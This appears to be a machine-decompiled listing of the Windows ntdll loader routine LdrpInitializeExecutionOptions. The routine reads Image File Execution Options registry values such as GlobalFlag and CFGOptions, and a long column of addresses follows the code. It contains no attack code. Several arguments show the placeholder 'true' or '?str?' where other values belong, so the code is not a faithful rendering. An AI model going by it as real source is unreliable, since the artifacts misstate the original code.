                                                                                                                                                                                          			E1D851FC9(signed int __ecx, signed int __edx, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, signed int _a16, char _a23, signed int _a24, signed int _a28, signed int _a32, char _a36, signed int _a40, signed int _a44, void* _a48, signed int _a56, signed int _a60, signed int _a64, char _a68, char _a72, short _a74, intOrPtr _a76, char _a80, short _a82, intOrPtr _a84, char _a88, short _a90, intOrPtr _a92, char _a96, short _a98, intOrPtr _a100, char _a104, short _a106, intOrPtr _a108, void* _a112, signed int* _a116, signed int* _a120, char _a124, short _a126, char* _a128, intOrPtr _a132, signed int _a136, signed int _a140, char _a144, signed int _a148, intOrPtr _a152, intOrPtr _a156, signed int _a160, signed int _a164, char _a168, char _a176, char _a1200, char _a2224, char _a3248, char _a4272, char _a5296, char _a5328, signed int _a5724) {
				void* _v0;
				signed int _v4;
				signed int _v12;
				signed int _v16;
				intOrPtr _v24;
				signed int _v72;
				intOrPtr _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t392;
				signed int _t399;
				signed char _t407;
				signed int _t409;
				short _t412;
				signed int _t420;
				signed int _t422;
				void* _t427;
				intOrPtr _t435;
				intOrPtr _t452;
				signed int _t454;
				signed int _t457;
				signed int _t463;
				signed int _t465;
				signed int _t469;
				signed int _t470;
				signed int _t471;
				signed int _t475;
				intOrPtr _t477;
				signed int _t482;
				intOrPtr _t483;
				signed int _t484;
				void* _t504;
				intOrPtr _t506;
				signed int _t511;
				intOrPtr _t512;
				intOrPtr _t538;
				signed int _t540;
				intOrPtr _t543;
				void* _t569;
				intOrPtr _t571;
				signed int _t573;
				intOrPtr _t576;
				intOrPtr _t602;
				signed int _t604;
				intOrPtr _t607;
				void* _t634;
				signed int* _t638;
				signed int* _t639;
				void* _t640;
				signed int _t641;
				char _t642;
				signed int* _t644;
				intOrPtr _t657;
				signed int _t663;
				signed int _t667;
				void* _t668;
				intOrPtr _t669;
				signed int _t670;
				void* _t676;
				signed int _t690;
				signed int _t691;
				void* _t692;
				signed int _t693;
				signed int _t694;
				signed int _t695;
				signed int _t696;
				signed int _t697;
				signed int _t699;
				void* _t701;
				signed int _t703;
				void* _t707;
				signed int _t708;
				signed int _t709;
				signed int _t710;
				signed int _t711;
				signed int _t712;
				signed int _t713;
				signed int _t714;
				signed int _t715;
				signed int _t716;
				signed int _t717;
				signed int _t718;
				signed int _t719;

				_t719 = _t718 & 0xfffffff8;
				E1D8164E0(0x1664);
				_a5724 =  *0x1d8cb370 ^ _t719;
				_a8 = __edx;
				_a60 = __ecx;
				_t644 = _a8;
				_a132 = _a4;
				_t392 = _a12;
				_a140 = _a16;
				 *_t644 = 0;
				_t637 = 0;
				_a120 = _t392;
				_t699 = 0;
				 *_t392 = 0;
				_t690 = 0;
				_a116 = _t644;
				_a68 = 0;
				_v4 = 0;
				_a44 = 0;
				_a64 = 0;
				_a56 = 0;
				_a23 = 1;
				_a16 = 0;
				_a112 = 0;
				E1D851F45();
				if(( *( *((intOrPtr*)(_a8 + 0x10)) + 8) & 0x00004000) != 0) {
					L189:
					__eflags = E1D7F0130();
					if(__eflags != 0) {
						_t699 = _t699 | 0x00000001;
						__eflags = _t699;
					}
					_t646 = _t699;
					_t675 =  *( *((intOrPtr*)(_a8 + 0x10)) + 8);
					E1D87722B( *( *((intOrPtr*)(_a8 + 0x10)) + 8), __eflags);
					__eflags = _a23;
					if(_a23 != 0) {
						__eflags =  *0x1d8c5d70;
						if( *0x1d8c5d70 == 0) {
							__eflags =  *0x7ffe03a0 & 0x00000001;
							if(( *0x7ffe03a0 & 0x00000001) != 0) {
								_t646 = _a60;
								_t420 = E1D858A07(_t637, _a60,  &_a44);
								__eflags = _t420;
								if(_t420 < 0) {
									_t347 =  &_a44;
									 *_t347 = _a44 & 0x00000000;
									__eflags =  *_t347;
								} else {
									_t422 = E1D7C6CC0(_a44, L"GlobalFlag", "true",  &_a40, "true", 0);
									__eflags = _t422;
									if(_t422 >= 0) {
										 *(_a8 + 0x68) =  *(_a8 + 0x68) | _a40 & 0x02000100;
										_a16 = _a44;
									}
								}
							}
						}
					}
					_t399 = _a8;
					_t700 = 0;
					__eflags =  *(_t399 + 0x68) & 0x02000100;
					if(( *(_t399 + 0x68) & 0x02000100) != 0) {
						L212:
						_t691 = _a8;
						_t675 = _t691;
						_t700 = E1D851DD8(_a60, _t691, _a68, _a16, _a132, _a140);
						__eflags = _t700;
						if(_t700 >= 0) {
							goto L206;
						}
						_t407 =  *0x1d8c37c0; // 0x0
						__eflags = _t407 & 0x00000003;
						if((_t407 & 0x00000003) != 0) {
							E1D84E692("minkernel\\ntdll\\ldrinit.c", 0x2005, "LdrpInitializeExecutionOptions", 0, "Initializing the application verifier package failed with status 0x%08lx\n", _t700);
							_t407 =  *0x1d8c37c0; // 0x0
							_t719 = _t719 + 0x18;
						}
						__eflags = _t407 & 0x00000010;
						if((_t407 & 0x00000010) != 0) {
							asm("int3");
						}
						goto L208;
					} else {
						_t409 = E1D8536EC();
						__eflags = _t409;
						if(_t409 != 0) {
							goto L212;
						}
						__eflags = _t690;
						_t691 = _a8;
						if(_t690 != 0) {
							L206:
							__eflags =  *(_t691 + 0x478) & 0x00000001;
							if(( *(_t691 + 0x478) & 0x00000001) != 0) {
								_t368 = _t691 + 0x474;
								 *_t368 =  *(_t691 + 0x474) | 0x00000001;
								__eflags =  *_t368;
							}
							L208:
							__eflags = _t700;
							if(_t700 < 0) {
								L217:
								_t638 = _a116;
								__eflags =  *_t638;
								if( *_t638 != 0) {
									_push( *_t638);
									E1D812A80();
									 *_t638 =  *_t638 & 0x00000000;
									__eflags =  *_t638;
								}
								_t639 = _a120;
								__eflags =  *_t639;
								if( *_t639 != 0) {
									_push( *_t639);
									E1D812A80();
									 *_t639 =  *_t639 & 0x00000000;
									__eflags =  *_t639;
								}
								L221:
								__eflags = _a44;
								if(_a44 != 0) {
									_push(_a44);
									E1D812A80();
								}
								_pop(_t692);
								_pop(_t701);
								_pop(_t640);
								__eflags = _a5724 ^ _t719;
								return E1D814B50(_t700, _t640, _a5724 ^ _t719, _t675, _t692, _t701);
							}
							E1D85395B(_t637);
							goto L221;
						}
						__eflags = _t637;
						if(_t637 != 0) {
							goto L206;
						}
						__eflags =  *((intOrPtr*)(_t691 + 2)) - _t637;
						if( *((intOrPtr*)(_t691 + 2)) == _t637) {
							goto L206;
						}
						_a128 =  &_a5296;
						_a124 = 0;
						_t412 = 0x20;
						_a126 = _t412;
						__eflags = E1D7FB130(_t646,  *((intOrPtr*)( *((intOrPtr*)(_t691 + 0x10)) + 0x48)), 0x1d7a1a40,  &_a124);
						if(__eflags < 0) {
							_t700 = 0;
							__eflags = 0;
							L211:
							 *(_t691 + 0x68) =  *(_t691 + 0x68) | 0x00000070;
							goto L206;
						}
						_push( &_v0);
						_push(_t637);
						_push( &_a124);
						_t700 = E1D8007D0(_t637, _t691, 0, __eflags);
						__eflags = _t700;
						if(_t700 < 0) {
							goto L211;
						}
						__eflags = _v12 - _t637;
						if(_v12 == _t637) {
							goto L211;
						}
						goto L206;
					}
				}
				_t651 = _a60;
				_push( &_v4);
				_push(0);
				_t676 = 9;
				_t427 = E1D805E29(_a60, _t676);
				_t637 = _v12;
				if(_t427 < 0) {
					goto L189;
				} else {
					_t703 = _a8;
					 *_a116 = _t637;
					if(( *(_t703 + 3) & 0x00000010) != 0) {
						_t651 =  &_a5328;
						if(E1D851A93( &_a5328, _t676) >= 0) {
							E1D815050( &_a5328,  &_a168,  &_a5328);
							_t651 =  &_a160;
							_t634 = E1D85FEBB( &_a160, _t637,  &_a48);
							_t690 = _a44;
							if(_t634 >= 0) {
								 *_a120 = _t690;
							}
						}
					}
					E1D7C6C5D(_t690, _t637, L"DisableHeapLookaside", "true", 0x1d8c6934, "true", _t651, 0);
					E1D7C6C5D(_t690, _t637, L"FrontEndHeapDebugOptions", "true",  &_a40, "true", _t690, 0);
					E1D7C6C5D(_t690, _t637, L"ShutdownFlags", "true", 0x1d8c6944, "true", _t690, 0);
					_v72 = _v72 & 0x00000000;
					_t655 = _t690;
					E1D7C6C5D(_t690, _t637, L"UnloadEventTraceDepth", "true",  &_v72, "true", _t690, 0);
					_t435 = _v96;
					if(_t435 != 0) {
						 *0x1d8c3918 = _t435;
					}
					_v0 = _v0 & 0x00000000;
					E1D7C6C5D(_t690, _t637, L"MaxLoaderThreads", "true",  &_v0, "true", _t655, 0);
					_t657 = _v24;
					if(_t657 != 0) {
						 *((intOrPtr*)( *((intOrPtr*)(_t703 + 0x10)) + 0x2a0)) = _t657;
					}
					_v0 = _v0 & 0x00000000;
					_t658 = _t690;
					E1D7C6C5D(_t690, _t637, L"UseImpersonatedDeviceMap", "true",  &_v0, "true", _t657, 0);
					if(_v24 != 0) {
						 *0x1d8c5d58 = 1;
					}
					_v0 = _v0 & 0x00000000;
					E1D7C6C5D(_t690, _t637, L"TracingFlags", "true",  &_v0, "true", _t658, 0);
					_t660 = _v24;
					if(_v24 != 0) {
						asm("lock or [eax], ecx");
					}
					_v0 = _v0 & 0x00000000;
					_t675 = _t637;
					_t661 = _t690;
					if(E1D7C6C5D(_t690, _t637, L"RaiseExceptionOnPossibleDeadlock", ?str?,  &_v0, ?str?, _t660, 0) >= 0) {
						 *0x1d8c4ae1 = _v0 != 0;
					}
					_a48 = _a48 & 0x00000000;
					if(E1D7F1D10( &_a72, L"ExecuteOptions") < 0) {
						L45:
						if(E1D7F1D10( &_a80, L"DisableExceptionChainValidation") < 0) {
							L81:
							if(_a48 != 0) {
								_push("true");
								_push( &_a48);
								_push(0x22);
								_push(0xffffffff);
								E1D812B70();
							}
							L83:
							_v0 = _v0 & 0x00000000;
							if(E1D7F1D10( &_a88, L"CFGOptions") < 0) {
								L114:
								if(( *(_a8 + 3) & 0x00000001) == 0) {
									L119:
									if(E1D7F1D10( &_a96, L"MinimumStackCommitInBytes") < 0) {
										L143:
										_t663 = _a8;
										_t452 = _v0;
										if( *((intOrPtr*)(_t663 + 0x208)) < _t452) {
											 *((intOrPtr*)(_t663 + 0x208)) = _t452;
										}
										_t707 = 0;
										while(1) {
											_v0 = _v0 & 0x00000000;
											_t250 = _t707 + 0x1d7a1a60; // 0x0
											_t454 = E1D7C6CC0(_t637,  *_t250, "true",  &_v0, "true", 0);
											_t252 = _t707 + 0x1d7a1a64; // 0x0
											_t664 =  *_t252;
											_t707 = _t707 + 8;
											 *( *_t252) = _t454 & 0xffffff00 | _v24 != 0x00000000;
											if(_t707 == 0x18) {
												break;
											}
											_t637 = _v4;
										}
										_v0 = _v0 & 0x00000000;
										_t457 = E1D7F1D10( &_a104, L"MaxDeadActivationContexts");
										__eflags = _t457;
										if(_t457 < 0) {
											L173:
											_t637 = _v4;
											L174:
											_t708 = _a8;
											_t690 = _a56;
											_a12 =  *(_t708 + 0x68) >> 0x00000008 & 0xffffff01;
											_t665 = _t690;
											_t463 = E1D7C6C5D(_t690, _t637, L"GlobalFlag", "true",  &_a40, "true", _t664,  &_a112);
											__eflags = _t463;
											if(_t463 < 0) {
												L184:
												_t465 = E1D7C6C5D(_t690, _t637, L"GlobalFlag2", "true",  &_a40, "true", _t665, 0);
												__eflags = _t465;
												if(_t465 >= 0) {
													 *((intOrPtr*)(_t708 + 0x478)) = _a40;
												}
												__eflags =  *(_t708 + 0x68) & 0x02000100;
												_t699 = _a64;
												_a68 = _a12;
												if(( *(_t708 + 0x68) & 0x02000100) == 0) {
													_t329 =  &_a16;
													 *_t329 = _a16 & 0x00000000;
													__eflags =  *_t329;
												} else {
													_a23 = 0;
													_a16 = _a112;
												}
												goto L189;
											}
											_t709 = _a40;
											__eflags = _t709 & 0x02000100;
											if((_t709 & 0x02000100) == 0) {
												L182:
												_t469 = _a8;
												 *(_t469 + 0x68) = _t709;
												_t708 = _t469;
												goto L184;
											}
											_t665 = _a8;
											_t470 = E1D853152(_a8, _t690, _t637);
											__eflags = _t470;
											if(_t470 == 0) {
												_t709 = _t709 & 0xfdfffeff;
												__eflags = _t709;
												_a40 = _t709;
											}
											__eflags = _t709 & 0x02000100;
											if((_t709 & 0x02000100) != 0) {
												_t665 = _a60;
												_t471 = E1D853881(_a60,  &_a136);
												__eflags = _t471;
												if(_t471 < 0) {
													_t708 = _a8;
													goto L184;
												}
												__eflags = _a136;
												if(_a136 == 0) {
													_t709 = _t709 & 0xfdfffeff;
													__eflags = _t709;
													_a40 = _t709;
												}
											}
											goto L182;
										}
										_t637 = _v4;
										_push( &_a16);
										_push(0x400);
										_t710 =  &_a4272;
										_push(_t710);
										_push(2);
										_push( &_a104);
										_push(_t637);
										_t475 = E1D812B00();
										__eflags = _t475;
										if(_t475 < 0) {
											__eflags = _t475 - 0x80000005;
											if(_t475 != 0x80000005) {
												goto L174;
											} else {
												goto L157;
											}
											while(1) {
												L157:
												_t641 = _a16;
												_t664 =  *( *[fs:0x30] + 0x18);
												__eflags = _t664;
												if(_t664 == 0) {
													goto L173;
												}
												_t477 =  *0x1d8c5d78; // 0x0
												_t693 = E1D7E5D90(_t664, _t664, _t477 + 0x180000, _a16);
												__eflags = _t693;
												if(_t693 == 0) {
													goto L173;
												}
												_t710 = _t693;
												_push( &_a16);
												_push(_t641);
												_t637 = _v4;
												_push(_t693);
												_push(2);
												_push( &_a104);
												_push(_t637);
												_t482 = E1D812B00();
												__eflags = _t482;
												if(_t482 >= 0) {
													L151:
													_t483 =  *((intOrPtr*)(_t710 + 4));
													__eflags = _t483 - 3;
													if(_t483 == 3) {
														L166:
														_push("true");
														_pop(_t664);
														__eflags = _t483 - _t664;
														if(_t483 == _t664) {
															_a16 =  *((intOrPtr*)(_t710 + 8));
															__eflags =  *((intOrPtr*)(_t710 + 8)) - _t664;
															if( *((intOrPtr*)(_t710 + 8)) <= _t664) {
																_t291 = _t710 + 0xc; // 0xc
																E1D8188C0( &_v0, _t291,  *((intOrPtr*)(_t710 + 8)));
																_t719 = _t719 + 0xc;
															}
														}
														L169:
														__eflags = _t693;
														if(_t693 != 0) {
															E1D7E3BC0( *( *[fs:0x30] + 0x18), 0, _t693);
															_t637 = _v16;
														}
														_t484 = _v0;
														__eflags = _t484;
														if(_t484 != 0) {
															 *0x1d8c3940 = _t484;
														}
														goto L174;
													}
													__eflags = _t483 - 7;
													if(_t483 == 7) {
														goto L166;
													}
													_push("true");
													_pop(_t664);
													__eflags = _t483 - _t664;
													if(_t483 != _t664) {
														__eflags = _t483 - 0xb;
														if(_t483 != 0xb) {
															__eflags = _t483 - 1;
															if(_t483 == 1) {
																__eflags =  &_v0 & 0x00000003;
																if(__eflags == 0) {
																	_t278 = _t710 + 0xc; // 0xc
																	_a16 = _t664;
																	_a108 = _t278;
																	_a104 =  *((intOrPtr*)(_t710 + 8));
																	_a106 =  *((intOrPtr*)(_t710 + 8));
																	_push( &_v0);
																	_push(0);
																	_push( &_a104);
																	E1D8007D0(_t637, _t693, _t710, __eflags);
																}
															}
														}
													} else {
														__eflags =  *((intOrPtr*)(_t710 + 8)) - _t664;
														if( *((intOrPtr*)(_t710 + 8)) == _t664) {
															_a16 = _t664;
															_v0 =  *((intOrPtr*)(_t710 + 0xc));
														}
													}
													goto L169;
												}
												__eflags = _t482 - 0x80000005;
												if(_t482 != 0x80000005) {
													goto L169;
												}
												E1D7E3BC0( *( *[fs:0x30] + 0x18), 0, _t693);
											}
											goto L173;
										}
										_t693 = 0;
										__eflags = 0;
										goto L151;
									}
									_push( &_a36);
									_push(0x400);
									_t711 =  &_a3248;
									_push(_t711);
									_push(2);
									_push( &_a96);
									_push(_t637);
									_t504 = E1D812B00();
									if(_t504 < 0) {
										__eflags = _t504 - 0x80000005;
										if(_t504 != 0x80000005) {
											goto L143;
										} else {
											goto L128;
										}
										while(1) {
											L128:
											_t642 = _a36;
											_t667 =  *( *[fs:0x30] + 0x18);
											__eflags = _t667;
											if(_t667 == 0) {
												break;
											}
											_t506 =  *0x1d8c5d78; // 0x0
											_t694 = E1D7E5D90(_t667, _t667, _t506 + 0x180000, _a36);
											__eflags = _t694;
											if(_t694 == 0) {
												break;
											}
											_t711 = _t694;
											_push( &_a36);
											_push(_t642);
											_t637 = _v4;
											_push(_t694);
											_push(2);
											_push( &_a96);
											_push(_v4);
											_t511 = E1D812B00();
											__eflags = _t511;
											if(_t511 >= 0) {
												L122:
												_t512 =  *((intOrPtr*)(_t711 + 4));
												if(_t512 == 3 || _t512 == 7) {
													_push("true");
													_pop(_t668);
													__eflags = _t512 - _t668;
													if(_t512 == _t668) {
														_a36 =  *((intOrPtr*)(_t711 + 8));
														__eflags =  *((intOrPtr*)(_t711 + 8)) - _t668;
														if( *((intOrPtr*)(_t711 + 8)) <= _t668) {
															_t239 = _t711 + 0xc; // 0xc
															E1D8188C0( &_v0, _t239,  *((intOrPtr*)(_t711 + 8)));
															_t719 = _t719 + 0xc;
														}
													}
												} else {
													_push("true");
													_pop(_t669);
													if(_t512 != _t669) {
														__eflags = _t512 - 0xb;
														if(_t512 != 0xb) {
															__eflags = _t512 - 1;
															if(_t512 == 1) {
																__eflags =  &_v0 & 0x00000003;
																if(__eflags == 0) {
																	_t226 = _t711 + 0xc; // 0xc
																	_a36 = _t669;
																	_a100 = _t226;
																	_a96 =  *((intOrPtr*)(_t711 + 8));
																	_a98 =  *((intOrPtr*)(_t711 + 8));
																	_push( &_v0);
																	_push(0);
																	_push( &_a96);
																	E1D8007D0(_t637, _t694, _t711, __eflags);
																}
															}
														}
													} else {
														if( *((intOrPtr*)(_t711 + 8)) == _t669) {
															_a36 = _t669;
															_v0 =  *((intOrPtr*)(_t711 + 0xc));
														}
													}
												}
												L140:
												if(_t694 == 0) {
													goto L143;
												}
												E1D7E3BC0( *( *[fs:0x30] + 0x18), 0, _t694);
												break;
											}
											__eflags = _t511 - 0x80000005;
											if(_t511 != 0x80000005) {
												goto L140;
											}
											E1D7E3BC0( *( *[fs:0x30] + 0x18), 0, _t694);
										}
										_t637 = _v4;
										goto L143;
									}
									_t694 = 0;
									goto L122;
								}
								_a160 = _a160 & 0x00000000;
								_a164 = _a164 & 0x00000000;
								_push( &_a144);
								_push(1);
								_push(0x1d8c5a98);
								_a144 = 0x18;
								_a148 = _t637;
								_a156 = 0x40;
								_a152 = 0x1d7a1a38;
								_t700 = E1D812AB0();
								if(_t700 != 0xc0000034) {
									__eflags = _t700;
									if(_t700 < 0) {
										goto L217;
									}
									goto L119;
								}
								 *0x1d8c5a98 =  *0x1d8c5a98 & 0x00000000;
								goto L119;
							}
							_push( &_a32);
							_push(0x400);
							_t695 =  &_a2224;
							_push(_t695);
							_push(2);
							_push( &_a88);
							_push(_t637);
							_t712 = E1D812B00();
							if(_t712 < 0) {
								__eflags = _t712 - 0x80000005;
								if(_t712 != 0x80000005) {
									goto L111;
								} else {
									goto L93;
								}
								while(1) {
									L93:
									_t713 = _a32;
									_t670 =  *( *[fs:0x30] + 0x18);
									__eflags = _t670;
									if(_t670 == 0) {
										break;
									}
									_t538 =  *0x1d8c5d78; // 0x0
									_t540 = E1D7E5D90(_t670, _t670, _t538 + 0x180000, _a32);
									_v0 = _t540;
									__eflags = _t540;
									if(_t540 == 0) {
										break;
									}
									_t637 = _v4;
									_t661 =  &_a32;
									_push( &_a32);
									_push(_t713);
									_push(_t540);
									_t695 = _t540;
									_push(2);
									_push( &_a88);
									_push(_t637);
									_t712 = E1D812B00();
									__eflags = _t712;
									if(_t712 >= 0) {
										goto L86;
									}
									__eflags = _t712 - 0x80000005;
									if(_t712 != 0x80000005) {
										goto L109;
									} else {
										E1D7E3BC0( *( *[fs:0x30] + 0x18), 0, _t695);
										continue;
									}
								}
								_t637 = _v4;
								goto L114;
							} else {
								_a12 = 0;
								L86:
								_t543 =  *((intOrPtr*)(_t695 + 4));
								if(_t543 == 3 || _t543 == 7) {
									_push("true");
									_pop(_t661);
									__eflags = _t543 - _t661;
									if(_t543 != _t661) {
										goto L101;
									}
									_a32 =  *((intOrPtr*)(_t695 + 8));
									__eflags =  *((intOrPtr*)(_t695 + 8)) - _t661;
									if( *((intOrPtr*)(_t695 + 8)) > _t661) {
										_t712 = 0x80000005;
									} else {
										_t185 = _t695 + 0xc; // 0xc
										E1D8188C0( &_v0, _t185,  *((intOrPtr*)(_t695 + 8)));
										_t719 = _t719 + 0xc;
									}
									goto L109;
								} else {
									_push("true");
									_pop(_t661);
									if(_t543 != _t661) {
										__eflags = _t543 - 0xb;
										if(_t543 == 0xb) {
											L101:
											_t712 = 0xc0000024;
											goto L109;
										}
										__eflags = _t543 - 1;
										if(_t543 == 1) {
											__eflags =  &_v0 & 0x00000003;
											if(__eflags == 0) {
												_t172 = _t695 + 0xc; // 0xc
												_a32 = _t661;
												_a92 = _t172;
												_a88 =  *((intOrPtr*)(_t695 + 8));
												_a90 =  *((intOrPtr*)(_t695 + 8));
												_push( &_v0);
												_push(0);
												_push( &_a88);
												_t712 = E1D8007D0(_t637, _t695, _t712, __eflags);
											} else {
												_t712 = 0x80000002;
											}
											goto L109;
										}
										goto L101;
									} else {
										if( *((intOrPtr*)(_t695 + 8)) != _t661) {
											_t712 = 0xc0000004;
										} else {
											_a32 = _t661;
											_v0 =  *((intOrPtr*)(_t695 + 0xc));
										}
										L109:
										_t544 = _a12;
										if(_a12 != 0) {
											E1D7E3BC0( *( *[fs:0x30] + 0x18), 0, _t544);
											_t637 = _v16;
										}
										L111:
										if(_t712 >= 0 && (_v0 & 0x00000001) != 0) {
											E1D801D66(_t661, _t675, 0);
											 *0x1d8c9232 = 1;
											E1D801D66(_t661, _t675, 1);
										}
										goto L114;
									}
								}
							}
						}
						_push( &_a28);
						_push(0x400);
						_t696 =  &_a1200;
						_push(_t696);
						_push(2);
						_push( &_a80);
						_push(_t637);
						_t714 = E1D812B00();
						if(_t714 < 0) {
							__eflags = _t714 - 0x80000005;
							if(_t714 != 0x80000005) {
								goto L73;
							} else {
								goto L55;
							}
							while(1) {
								L55:
								_t715 = _a28;
								_t661 =  *( *[fs:0x30] + 0x18);
								__eflags = _t661;
								if(_t661 == 0) {
									break;
								}
								_t571 =  *0x1d8c5d78; // 0x0
								_t573 = E1D7E5D90(_t661, _t661, _t571 + 0x180000, _a28);
								_v0 = _t573;
								__eflags = _t573;
								if(_t573 == 0) {
									break;
								}
								_t637 = _v4;
								_t661 =  &_a28;
								_push( &_a28);
								_push(_t715);
								_push(_t573);
								_t696 = _t573;
								_push(2);
								_push( &_a80);
								_push(_t637);
								_t714 = E1D812B00();
								__eflags = _t714;
								if(_t714 >= 0) {
									goto L48;
								}
								__eflags = _t714 - 0x80000005;
								if(_t714 != 0x80000005) {
									goto L71;
								} else {
									E1D7E3BC0( *( *[fs:0x30] + 0x18), 0, _t696);
									continue;
								}
							}
							_t637 = _v4;
							goto L81;
						} else {
							_a12 = 0;
							L48:
							_t576 =  *((intOrPtr*)(_t696 + 4));
							if(_t576 == 3 || _t576 == 7) {
								_push("true");
								_pop(_t661);
								__eflags = _t576 - _t661;
								if(_t576 != _t661) {
									goto L63;
								} else {
									_a28 =  *((intOrPtr*)(_t696 + 8));
									__eflags =  *((intOrPtr*)(_t696 + 8)) - _t661;
									if( *((intOrPtr*)(_t696 + 8)) > _t661) {
										_t714 = 0x80000005;
									} else {
										_t139 = _t696 + 0xc; // 0xc
										E1D8188C0(0x1d8c38bc, _t139,  *((intOrPtr*)(_t696 + 8)));
										_t719 = _t719 + 0xc;
									}
									goto L71;
								}
							} else {
								_push("true");
								_pop(_t661);
								if(_t576 != _t661) {
									__eflags = _t576 - 0xb;
									if(_t576 == 0xb) {
										L63:
										_t714 = 0xc0000024;
										goto L71;
									}
									__eflags = _t576 - 1;
									if(_t576 == 1) {
										_t675 = 0x1d8c38bc;
										__eflags = 0;
										if(0 == 0) {
											_t127 = _t696 + 0xc; // 0xc
											_a28 = _t661;
											_a84 = _t127;
											_a80 =  *((intOrPtr*)(_t696 + 8));
											_push(0x1d8c38bc);
											_a82 =  *((intOrPtr*)(_t696 + 8));
											_push(0);
											_push( &_a80);
											_t714 = E1D8007D0(_t637, _t696, _t714, 0);
										} else {
											_t714 = 0x80000002;
										}
										goto L71;
									}
									goto L63;
								} else {
									if( *((intOrPtr*)(_t696 + 8)) != _t661) {
										_t714 = 0xc0000004;
									} else {
										_a28 = _t661;
										 *0x1d8c38bc =  *((intOrPtr*)(_t696 + 0xc));
									}
									L71:
									_t577 = _a12;
									if(_a12 != 0) {
										E1D7E3BC0( *( *[fs:0x30] + 0x18), 0, _t577);
										_t637 = _v16;
									}
									L73:
									if(_t714 < 0) {
										goto L81;
									} else {
										_t569 =  *0x1d8c38bc; // 0x0
										if(_t569 != 0 && _t569 != 3 && _t569 != 2) {
											 *0x1d8c38bc = 1;
										}
										if(_a48 == 0) {
											goto L83;
										} else {
											if( *0x1d8c38bc == 1) {
												_a48 = _a48 | 0x00000040;
											}
											goto L81;
										}
									}
								}
							}
						}
					}
					_push( &_a24);
					_push(0x400);
					_t697 =  &_a176;
					_push(_t697);
					_push(2);
					_push( &_a72);
					_push(_t637);
					_t716 = E1D812B00();
					if(_t716 < 0) {
						__eflags = _t716 - 0x80000005;
						if(_t716 != 0x80000005) {
							goto L43;
						} else {
							goto L25;
						}
						while(1) {
							L25:
							_t717 = _a24;
							_t661 =  *( *[fs:0x30] + 0x18);
							__eflags = _t661;
							if(_t661 == 0) {
								break;
							}
							_t602 =  *0x1d8c5d78; // 0x0
							_t604 = E1D7E5D90(_t661, _t661, _t602 + 0x180000, _a24);
							_v0 = _t604;
							__eflags = _t604;
							if(_t604 == 0) {
								break;
							}
							_t637 = _v4;
							_t661 =  &_a24;
							_push( &_a24);
							_push(_t717);
							_push(_t604);
							_t697 = _t604;
							_push(2);
							_push( &_a72);
							_push(_t637);
							_t716 = E1D812B00();
							__eflags = _t716;
							if(_t716 >= 0) {
								goto L19;
							}
							__eflags = _t716 - 0x80000005;
							if(_t716 != 0x80000005) {
								goto L41;
							} else {
								E1D7E3BC0( *( *[fs:0x30] + 0x18), 0, _t697);
								continue;
							}
						}
						_t637 = _v4;
						goto L45;
					} else {
						_a12 = 0;
						L19:
						_t607 =  *((intOrPtr*)(_t697 + 4));
						if(_t607 == 3 || _t607 == 7) {
							_push("true");
							_pop(_t661);
							__eflags = _t607 - _t661;
							if(_t607 != _t661) {
								goto L33;
							} else {
								_a24 =  *((intOrPtr*)(_t697 + 8));
								__eflags =  *((intOrPtr*)(_t697 + 8)) - _t661;
								if( *((intOrPtr*)(_t697 + 8)) > _t661) {
									_t716 = 0x80000005;
								} else {
									_t100 = _t697 + 0xc; // 0xc
									E1D8188C0( &_a48, _t100,  *((intOrPtr*)(_t697 + 8)));
									_t719 = _t719 + 0xc;
								}
								goto L41;
							}
						} else {
							_push("true");
							_pop(_t661);
							if(_t607 != _t661) {
								__eflags = _t607 - 0xb;
								if(_t607 == 0xb) {
									L33:
									_t716 = 0xc0000024;
									goto L41;
								}
								__eflags = _t607 - 1;
								if(_t607 == 1) {
									__eflags =  &_a48 & 0x00000003;
									if(__eflags == 0) {
										_t87 = _t697 + 0xc; // 0xc
										_a24 = _t661;
										_a76 = _t87;
										_a72 =  *((intOrPtr*)(_t697 + 8));
										_a74 =  *((intOrPtr*)(_t697 + 8));
										_push( &_a48);
										_push(0);
										_push( &_a72);
										_t716 = E1D8007D0(_t637, _t697, _t716, __eflags);
									} else {
										_t716 = 0x80000002;
									}
									goto L41;
								}
								goto L33;
							} else {
								if( *((intOrPtr*)(_t697 + 8)) != _t661) {
									_t716 = 0xc0000004;
								} else {
									_a24 = _t661;
									_a48 =  *((intOrPtr*)(_t697 + 0xc));
								}
								L41:
								_t608 = _a12;
								if(_a12 != 0) {
									E1D7E3BC0( *( *[fs:0x30] + 0x18), 0, _t608);
									_t637 = _v16;
								}
								L43:
								if(_t716 >= 0) {
									asm("sbb eax, eax");
									_a48 = ( ~_a48 & 0xfffffff5) + 0xd;
								}
								goto L45;
							}
						}
					}
				}
			}
























































































                                                                                                                                                                                          0x1d851fce
                                                                                                                                                                                          0x1d851fd6
                                                                                                                                                                                          0x1d851fe2
                                                                                                                                                                                          0x1d851fec
                                                                                                                                                                                          0x1d851ff3
                                                                                                                                                                                          0x1d851ff7
                                                                                                                                                                                          0x1d851ffa
                                                                                                                                                                                          0x1d852001
                                                                                                                                                                                          0x1d852005
                                                                                                                                                                                          0x1d85200f
                                                                                                                                                                                          0x1d852011
                                                                                                                                                                                          0x1d852014
                                                                                                                                                                                          0x1d85201b
                                                                                                                                                                                          0x1d85201d
                                                                                                                                                                                          0x1d85201f
                                                                                                                                                                                          0x1d852023
                                                                                                                                                                                          0x1d85202a
                                                                                                                                                                                          0x1d85202e
                                                                                                                                                                                          0x1d852032
                                                                                                                                                                                          0x1d852036
                                                                                                                                                                                          0x1d85203a
                                                                                                                                                                                          0x1d85203e
                                                                                                                                                                                          0x1d852043
                                                                                                                                                                                          0x1d852047
                                                                                                                                                                                          0x1d85204e
                                                                                                                                                                                          0x1d852061
                                                                                                                                                                                          0x1d852c86
                                                                                                                                                                                          0x1d852c8b
                                                                                                                                                                                          0x1d852c8d
                                                                                                                                                                                          0x1d852c8f
                                                                                                                                                                                          0x1d852c8f
                                                                                                                                                                                          0x1d852c8f
                                                                                                                                                                                          0x1d852c96
                                                                                                                                                                                          0x1d852c9b
                                                                                                                                                                                          0x1d852c9e
                                                                                                                                                                                          0x1d852ca3
                                                                                                                                                                                          0x1d852ca8
                                                                                                                                                                                          0x1d852caa
                                                                                                                                                                                          0x1d852cb1
                                                                                                                                                                                          0x1d852cb3
                                                                                                                                                                                          0x1d852cba
                                                                                                                                                                                          0x1d852cbc
                                                                                                                                                                                          0x1d852cc5
                                                                                                                                                                                          0x1d852cca
